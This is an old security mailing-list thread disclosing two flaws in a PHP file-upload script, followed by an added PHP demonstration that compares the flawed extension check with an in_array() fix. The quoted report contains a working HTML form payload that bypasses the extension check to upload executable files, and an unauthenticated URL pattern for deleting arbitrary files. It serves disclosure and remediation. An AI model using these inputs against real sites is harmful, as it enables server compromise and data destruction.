Message-ID: <285472c905061508352a9c1858@mail.gmail.com>
Date: Wed, 15 Jun 2005 16:35:05 +0100
From: <systemcracker@...il.com>
To: bugtraq@...urityfocus.com
Subject: Re: File Upload Manager Sploits


Also, I think this hole only occurs when register_globals is ON. In
the latest version of PHP, this defaults to OFF.

I've alerted the developers to this bug.

> On 6/15/05, systemcracker@...il.com <systemcracker@...il.com> wrote:
> > after some digging on google, I've found that this refers to the "File
> > Upload Manager" at
> > http://www.mtnpeak.net/webdev/index.php?pg=php
> > rather than any number of other File Upload Managers. It's a common
> > name, please include a url or at least vendor name in future.
> >
> > On 12 Jun 2005 22:22:45 -0000, blackshoe@...il.com <blackshoe@...il.com> wrote:
> > > Below is some code for a recent unpatched exploit for file managers using php as the base code. Share this with the world and help protect.
> > >
> > > File Upload Manager - Bypass File Extension and Arbitrary File Delete
> > > nothing to see here @ hackthissite.org
> > >
> > > Through an input validation flaw, users are able to upload files that are not on the approved extension list. This can potentially allow users to upload .php files and gain permissions of the web server to execute commands and scripts.
> > >
> > > The code that checks for invalid file extensions makes use of an uninitialized variable which you can inject values into:
> > >
> > >         // $test is never initialized before this loop
> > >         for($i=0;$i<count($file_ext_allow);$i++)
> > >         {
> > >                 if (getlast($fileupload_name)!=$file_ext_allow[$i])
> > >                         $test.="~~";
> > >         }
> > >         $exp=explode("~~",$test);
> > >
> > >         if (count($exp)==(count($file_ext_allow)+1))
> > >         { /* (do not upload) */ } else { /* (upload) */ }
> > >
> > > With each mismatch, they add '~~' to the variable 'test' and then compare it to the count of the original valid file extensions array.
> > >
> > > Users can create an html form with an extra form variable 'test' with the value of '~~~~~~' which will allow you to bypass the extension validation:
> > >
> > > <form method="post" enctype="multipart/form-data" action="http://www.asdf.com/url/to/fileuploader/index.php">
> > > file: <input type="file" name="fileupload" class="textfield" size="30">
> > > exxploitz: <input type="text" name="test" class="textfield" size="46" value="~~~~~~">
> > > <input type="submit" value="upload" class="button">
> > > </form>
> > >
> > > Fix: Use php's in_array() function to check to see if an extension is in the valid list.
> > >
> > >
> > > In an unrelated flaw, users are able to delete arbitrary files on the webserver by not checking authentication before passing it to delete functions.
> > >
> > > url to view a file: /index.php?act=view&file=d2VlLnBocC50eHQ=
> > > url to delete the same file: /index.php?act=del&file=d2VlLnBocC50eHQ=
> > >
> > > to choose what file to delete, just do base64_encode("filename");
> > >
> >
> >
> > --
> > Computing tools, PHP code, online tools and more at http://www.puremango.co.uk
> >
> 
> 
> --
> Computing tools, PHP code, online tools and more at http://www.puremango.co.uk
> 


-- 
Computing tools, PHP code, online tools and more at http://www.puremango.co.uk
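
Added example (not part of the original posts and not the application's code): the counting check from the quoted report next to the in_array() fix it recommends. ext_of() is a hypothetical stand-in for the application's getlast(), the $seed parameter models the value register_globals would place in the uninitialized $test, and the extension list is constructed sample data.

```php
<?php
// Added example, not the application's code. $seed models what register_globals
// would copy from a request parameter named "test" into the uninitialized $test.

// Hypothetical stand-in for the application's getlast(): text after the last dot.
function ext_of(string $name): string {
    return strtolower(pathinfo($name, PATHINFO_EXTENSION));
}

// The counting check from the report, with the uninitialized variable made explicit.
function legacy_allows(string $name, array $allow, string $seed = ''): bool {
    $test = $seed;
    foreach ($allow as $ext) {
        if (ext_of($name) != $ext) {
            $test .= '~~';
        }
    }
    // Rejects only when the number of pieces equals the list length plus one,
    // so any extra separators already in $test turn a reject into an accept.
    return count(explode('~~', $test)) != count($allow) + 1;
}

// The fix suggested in the report: a strict membership test with no shared state.
function hardened_allows(string $name, array $allow): bool {
    return in_array(ext_of($name), $allow, true);
}

// Constructed sample data: allow-list and file names are illustrative only.
$allow = ['gif', 'jpg', 'png'];
$cases = [
    ['photo.jpg', ''],        // allowed extension, clean state
    ['page.php', ''],         // disallowed extension, clean state
    ['page.php', '~~~~~~'],   // disallowed extension, seed value from the report's form
];

foreach ($cases as [$name, $seed]) {
    printf(
        "%-10s seed=%-9s legacy=%-5s hardened=%s\n",
        $name,
        var_export($seed, true),
        var_export(legacy_allows($name, $allow, $seed), true),
        var_export(hardened_allows($name, $allow), true)
    );
}
```

The hardened check gives the same answer for every seed because its result depends only on the file name and the allow-list, which also makes it independent of the register_globals setting.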

